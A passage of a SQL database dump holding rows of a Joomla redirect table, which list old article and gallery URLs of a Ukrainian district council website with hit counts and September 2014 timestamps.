00:00:00',301),(1051,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&catid=53&Itemid=94&lang=ru','','','',21,0,'2014-09-17 03:15:16','0000-00-00 00:00:00',301),(1052,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1366:-2014-&catid=60:--11072014-&Itemid=108&lang=uk','','','',28,0,'2014-09-17 03:15:44','0000-00-00 00:00:00',301),(1053,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&catid=56&Itemid=97&lang=en','','','',10,0,'2014-09-17 03:15:48','0000-00-00 00:00:00',301),(1054,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-17 03:17:04','0000-00-00 00:00:00',301),(1055,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1200:2014-01-31-07-40-52&catid=56&Itemid=97&lang=uk','','','',11,0,'2014-09-17 03:20:27','0000-00-00 00:00:00',301),(1056,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-17 03:33:10','0000-00-00 00:00:00',301),(1057,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',13,0,'2014-09-17 03:42:56','0000-00-00 00:00:00',301),(1058,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=49:--12042013-&Itemid=88&lang=ru','','','',7,0,'2014-09-17 03:46:23','0000-00-00 00:00:00',301),(1059,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:-2012-2013-&catid=47&Itemid=86&lang=ru','','','',8,0,'2014-09-17 03:46:25','0000-00-00 00:00:00',301),(1060,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1378:2014-08-27-11-29-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',25,0,'2014-09-17 03:48:56','0000-00-00 00:00:00',301),(1061,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-------l---28r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',8,0,'2014-09-17 03:50:44','0000-00-00 00:00:00',301),(1062,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=893:-2013-2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',8,0,'2014-09-17 03:50:57','0000-00-00 00:00:00',301),(1063,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:----------2012-2013-&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-09-17 03:50:58','0000-00-00 00:00:00',301),(1064,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=925:-l-r-&catid=47:-21022013-&Itemid=86&lang=uk','','','',2,0,'2014-09-17 03:52:25','0000-00-00 00:00:00',301),(1065,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:-2012-2013-&catid=47:-21022013-&Itemid=86&lang=uk','','','',3,0,'2014-09-17 03:52:45','0000-00-00 00:00:00',301),(1066,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:----------2012-2013-&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-09-17 03:53:33','0000-00-00 00:00:00',301),(1067,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-------l---28r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',4,0,'2014-09-17 03:53:48','0000-00-00 00:00:00',301),(1068,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1152:2013-11-28-14-58-05&catid=54&Itemid=95&lang=ru','','','',4,0,'2014-09-17 03:55:32','0000-00-00 00:00:00',301),(1069,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',12,0,'2014-09-17 03:56:01','0000-00-00 00:00:00',301),(1070,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-17 03:56:07','0000-00-00 00:00:00',301),(1071,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=36&Itemid=70&lang=ru','','','',5,0,'2014-09-17 03:56:20','0000-00-00 00:00:00',301),(1072,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=51&Itemid=92&lang=ru','','','',7,0,'2014-09-17 03:57:09','0000-00-00 00:00:00',301),(1073,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',12,0,'2014-09-17 03:57:22','0000-00-00 00:00:00',301),(1074,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=51:--19072013-&Itemid=92&lang=uk','','','',13,0,'2014-09-17 03:57:24','0000-00-00 00:00:00',301),(1075,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',12,0,'2014-09-17 03:57:53','0000-00-00 00:00:00',301),(1076,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1117:--------l-r----&catid=53:--25102013-&Itemid=94&lang=ru','','','',16,0,'2014-09-17 03:58:33','0000-00-00 00:00:00',301),(1077,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=875:--------2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2014-09-17 03:58:46','0000-00-00 00:00:00',301),(1078,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-lr-2012-2015-&catid=49&Itemid=88&lang=uk','','','',13,0,'2014-09-17 04:00:40','0000-00-00 00:00:00',301),(1079,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',22,0,'2014-09-17 04:00:43','0000-00-00 00:00:00',301),(1080,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',17,0,'2014-09-17 04:00:59','0000-00-00 00:00:00',301),(1081,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=876:2012-12-18-09-32-45&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-09-17 04:02:26','0000-00-00 00:00:00',301),(1082,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=933:-2013-2017-&catid=47:--21022013-&Itemid=86&lang=en','','','',8,0,'2014-09-17 04:02:50','0000-00-00 00:00:00',301),(1083,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=49&Itemid=88&lang=en','','','',9,0,'2014-09-17 04:03:43','0000-00-00 00:00:00',301),(1084,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=36&Itemid=70&lang=en','','','',8,0,'2014-09-17 04:06:40','0000-00-00 00:00:00',301),(1085,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1234:2014-03-04-09-59-46&catid=11&Itemid=14&lang=ru','','','',32,0,'2014-09-17 04:07:32','0000-00-00 00:00:00',301),(1086,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',6,0,'2014-09-17 04:07:46','0000-00-00 00:00:00',301),(1087,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-17 04:10:10','0000-00-00 00:00:00',301),(1088,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1368:2014-07-17-04-39-11&catid=11&Itemid=14&lang=en','','','',8,0,'2014-09-17 04:10:15','0000-00-00 00:00:00',301),(1089,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=933:-2013-2017-&catid=47&Itemid=86&lang=en','','','',10,0,'2014-09-17 04:14:02','0000-00-00 00:00:00',301),(1090,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:-2014-&catid=56:--03022014-&Itemid=97&lang=uk','','','',17,0,'2014-09-17 04:14:16','0000-00-00 00:00:00',301),(1091,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1271:2014-04-09-05-14-20&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',16,0,'2014-09-17 04:15:47','0000-00-00 00:00:00',301),(1092,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=879:2012-12-21-17-02-01&catid=46&Itemid=85&lang=en','','','',9,0,'2014-09-17 04:17:14','0000-00-00 00:00:00',301),(1093,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11&Itemid=14&lang=uk','','','',21,0,'2014-09-17 04:17:28','0000-00-00 00:00:00',301),(1094,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=57&Itemid=98&lang=uk','','','',6,0,'2014-09-17 04:19:09','0000-00-00 00:00:00',301),(1095,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1118:2013-10-25-12-24-30&catid=53:--25102013-&Itemid=94&lang=uk','','','',24,0,'2014-09-17 04:19:10','0000-00-00 00:00:00',301),(1096,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1096:2013-09-24-13-34-16&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',19,0,'2014-09-17 04:19:48','0000-00-00 00:00:00',301),(1097,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:--------------------2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',8,0,'2014-09-17 04:19:52','0000-00-00 00:00:00',301),(1098,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=866:2012-12-14-06-58-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-17 04:20:55','0000-00-00 00:00:00',301),(1099,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=955:2013-03-07-06-31-04&catid=48:--11032013-&Itemid=87&lang=en','','','',20,0,'2014-09-17 04:20:56','0000-00-00 00:00:00',301),(1100,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1210:2014-02-03-13-20-51&catid=56:--03022014-&Itemid=97&lang=uk','','','',11,0,'2014-09-17 04:21:11','0000-00-00 00:00:00',301),(1101,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-lr-&catid=51:--19072013-&Itemid=92&lang=ru','','','',14,0,'2014-09-17 04:22:36','0000-00-00 00:00:00',301),(1102,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&Itemid=14&lang=en','','','',12,0,'2014-09-17 04:24:19','0000-00-00 00:00:00',301),(1103,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&Itemid=14&lang=en','','','',12,0,'2014-09-17 04:25:22','0000-00-00 00:00:00',301),(1104,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=57:--15042014-&Itemid=98&lang=uk','','','',6,0,'2014-09-17 04:25:23','0000-00-00 00:00:00',301),(1105,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:--------2014--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',8,0,'2014-09-17 04:25:25','0000-00-00 00:00:00',301),(1106,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=53:--25102013-&Itemid=94&lang=en','','','',8,0,'2014-09-17 04:26:07','0000-00-00 00:00:00',301),(1107,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:----24----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-17 04:26:37','0000-00-00 00:00:00',301),(1108,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-17 04:27:54','0000-00-00 00:00:00',301),(1109,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&Itemid=14&lang=ru','','','',11,0,'2014-09-17 04:29:30','0000-00-00 00:00:00',301),(1110,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-2013-i-2014-&catid=56&Itemid=97&lang=uk','','','',10,0,'2014-09-17 04:30:24','0000-00-00 00:00:00',301),(1111,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:-2014-&catid=53&Itemid=94&lang=uk','','','',9,0,'2014-09-17 04:31:31','0000-00-00 00:00:00',301),(1112,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=866:2012-12-14-06-58-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-17 04:35:03','0000-00-00 00:00:00',301),(1113,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-09-17 04:41:34','0000-00-00 00:00:00',301),(1114,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=49&Itemid=88&lang=uk','','','',16,0,'2014-09-17 04:42:37','0000-00-00 00:00:00',301),(1115,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=47&Itemid=86&lang=uk','','','',18,0,'2014-09-17 04:44:22','0000-00-00 00:00:00',301),(1116,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:----------2012-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2014-09-17 04:45:27','0000-00-00 00:00:00',301),(1117,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-17 04:48:31','0000-00-00 00:00:00',301),(1118,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&Itemid=14&lang=en','','','',12,0,'2014-09-17 04:49:13','0000-00-00 00:00:00',301),(1119,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:-l-r&catid=53:--25102013-&Itemid=94&lang=en','','','',8,0,'2014-09-17 04:49:44','0000-00-00 00:00:00',301),(1120,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1089:-l-r-&catid=53&Itemid=94&lang=ru','','','',10,0,'2014-09-17 04:50:15','0000-00-00 00:00:00',301),(1121,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=961:2013-03-11-10-51-56&catid=48:--11032013-&Itemid=87&lang=ru','','','',9,0,'2014-09-17 04:51:49','0000-00-00 00:00:00',301),(1122,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=987:2013-04-15-06-06-41&catid=49&Itemid=88&lang=ru','','','',6,0,'2014-09-17 04:52:41','0000-00-00 00:00:00',301),(1123,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11&Itemid=14&lang=uk','','','',13,0,'2014-09-17 04:55:58','0000-00-00 00:00:00',301),(1124,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-17 04:56:05','0000-00-00 00:00:00',301),(1125,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=51:--19072013-&Itemid=92&lang=ru','','','',8,0,'2014-09-17 05:01:52','0000-00-00 00:00:00',301),(1126,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-17 05:06:27','0000-00-00 00:00:00',301),(1127,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=36&Itemid=70&lang=ru','','','',4,0,'2014-09-17 05:17:32','0000-00-00 00:00:00',301),(1128,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-17 05:27:43','0000-00-00 00:00:00',301),(1129,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=49:--12042013-&Itemid=88&lang=uk','','','',6,0,'2014-09-17 05:28:33','0000-00-00 00:00:00',301),(1130,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:----20-----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-17 05:37:45','0000-00-00 00:00:00',301),(1131,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&Itemid=14&lang=en','','','',6,0,'2014-09-17 05:39:09','0000-00-00 00:00:00',301),(1132,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:------15112013&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',3,0,'2014-09-17 05:40:57','0000-00-00 00:00:00',301),(1133,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=894:-2013-2015-&catid=47:-21022013-&Itemid=86&lang=uk','','','',4,0,'2014-09-17 05:42:01','0000-00-00 00:00:00',301),(1134,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=925:-l-r-&catid=47:--21022013-&Itemid=86&lang=uk','','','',13,0,'2014-09-17 05:43:04','0000-00-00 00:00:00',301),(1135,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=934:---------6---16112010-5---------------&catid=47:-21022013-&Itemid=86&lang=en','','','',4,0,'2014-09-17 05:44:32','0000-00-00 00:00:00',301),(1136,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-17 05:52:04','0000-00-00 00:00:00',301),(1137,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',20,0,'2014-09-17 05:58:08','0000-00-00 00:00:00',301),(1138,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=923:-17-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-17 06:06:26','0000-00-00 00:00:00',301),(1139,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-l-28r-&catid=51&Itemid=92&lang=ru','','','',7,0,'2014-09-17 06:07:54','0000-00-00 00:00:00',301),(1140,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&Itemid=14&lang=en','','','',8,0,'2014-09-17 06:11:28','0000-00-00 00:00:00',301),(1141,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-l-28r-&catid=51:--19072013-&Itemid=92&lang=uk','','','',5,0,'2014-09-17 06:16:23','0000-00-00 00:00:00',301),(1142,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=49:--12042013-&Itemid=88&lang=uk','','','',6,0,'2014-09-17 06:17:00','0000-00-00 00:00:00',301),(1143,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',20,0,'2014-09-17 06:18:24','0000-00-00 00:00:00',301),(1144,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',10,0,'2014-09-17 06:32:57','0000-00-00 00:00:00',301),(1145,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-l-r-&catid=56:--03022014-&Itemid=97&lang=uk','','','',16,0,'2014-09-17 06:33:03','0000-00-00 00:00:00',301),(1146,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-17 06:36:29','0000-00-00 00:00:00',301),(1147,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:--------------------2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',15,0,'2014-09-17 06:37:52','0000-00-00 00:00:00',301),(1148,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1154:7-&catid=11&Itemid=14&lang=en','','','',14,0,'2014-09-17 06:38:38','0000-00-00 00:00:00',301),(1149,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=uk&Itemid=','','','',8,0,'2014-09-17 06:45:44','0000-00-00 00:00:00',301),(1150,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=en','','','',5,0,'2014-09-17 06:45:58','0000-00-00 00:00:00',301),(1151,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1210:2014-02-03-13-20-51&catid=56:--03022014-&Itemid=97&lang=ru','','','',25,0,'2014-09-17 06:46:01','0000-00-00 00:00:00',301),(1152,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:---------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',6,0,'2014-09-17 06:47:30','0000-00-00 00:00:00',301),(1153,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&Itemid=14&lang=en','','','',14,0,'2014-09-17 06:47:33','0000-00-00 00:00:00',301),(1154,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&Itemid=14&lang=ru','','','',11,0,'2014-09-17 06:49:07','0000-00-00 00:00:00',301),(1155,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=887:-2013-&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-17 06:49:33','0000-00-00 00:00:00',301),(1156,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',12,0,'2014-09-17 06:50:13','0000-00-00 00:00:00',301),(1157,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&Itemid=14&lang=uk','','','',16,0,'2014-09-17 06:50:28','0000-00-00 00:00:00',301),(1158,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=1&lang=uk','','','',13,0,'2014-09-17 06:51:03','0000-00-00 00:00:00',301),(1159,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:-lr-&catid=59&Itemid=107&lang=uk','','','',8,0,'2014-09-17 06:51:53','0000-00-00 00:00:00',301),(1160,'http://www.malyn-rayrada.org.ua/index.php?view=category&id=5:2010-06-05-12-51-34&option=com_content&Itemid=18&lang=uk','','','',7,0,'2014-09-17 06:52:36','0000-00-00 00:00:00',301),(1161,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',10,0,'2014-09-17 06:55:53','0000-00-00 00:00:00',301),(1162,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-17 06:56:34','0000-00-00 00:00:00',301),(1163,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',21,0,'2014-09-17 06:56:40','0000-00-00 00:00:00',301),(1164,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=880:2012-12-21-17-03-54&catid=46:--21122012&Itemid=85&lang=ru','','','',10,0,'2014-09-17 06:57:14','0000-00-00 00:00:00',301),(1165,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1007:-4-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',18,0,'2014-09-17 06:57:57','0000-00-00 00:00:00',301),(1166,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=862:------qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',2,0,'2014-09-17 06:57:59','0000-00-00 00:00:00',301),(1167,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&Itemid=32&lang=uk','','','',22,0,'2014-09-17 06:58:38','0000-00-00 00:00:00',301),(1168,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=57:--15042014-&Itemid=98&lang=uk','','','',13,0,'2014-09-17 07:00:39','0000-00-00 00:00:00',301),(1169,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=51&Itemid=92&lang=ru','','','',8,0,'2014-09-17 07:02:45','0000-00-00 00:00:00',301),(1170,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&lang=en','','','',9,0,'2014-09-17 07:03:40','0000-00-00 00:00:00',301),(1171,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11&lang=en','','','',9,0,'2014-09-17 07:04:11','0000-00-00 00:00:00',301),(1172,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&lang=en','','','',10,0,'2014-09-17 07:04:14','0000-00-00 00:00:00',301),(1173,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-17 07:04:53','0000-00-00 00:00:00',301),(1174,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=924:2013-02-20-19-06-08&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',23,0,'2014-09-17 07:05:52','0000-00-00 00:00:00',301),(1175,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-17 07:06:30','0000-00-00 00:00:00',301),(1176,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=4&Itemid=32&lang=uk','','','',11,0,'2014-09-17 07:06:53','0000-00-00 00:00:00',301),(1177,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1034:2013-06-23-15-11-25&catid=11&lang=uk','','','',5,0,'2014-09-17 07:07:50','0000-00-00 00:00:00',301),(1178,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=880:2012-12-21-17-03-54&catid=46&Itemid=85&lang=en','','','',8,0,'2014-09-17 07:08:23','0000-00-00 00:00:00',301),(1179,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1119:2013-10-25-12-26-37&catid=53:--25102013-&Itemid=94&lang=en','','','',9,0,'2014-09-17 07:09:25','0000-00-00 00:00:00',301),(1180,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-17 07:10:13','0000-00-00 00:00:00',301),(1181,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=uk&Itemid=','','','',11,0,'2014-09-17 07:11:25','0000-00-00 00:00:00',301),(1182,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-17 07:12:00','0000-00-00 00:00:00',301),(1183,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-17 07:13:29','0000-00-00 00:00:00',301),(1184,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1221:2014-02-22-08-09-27&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',13,0,'2014-09-17 07:13:34','0000-00-00 00:00:00',301),(1185,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=en','','','',8,0,'2014-09-17 07:14:27','0000-00-00 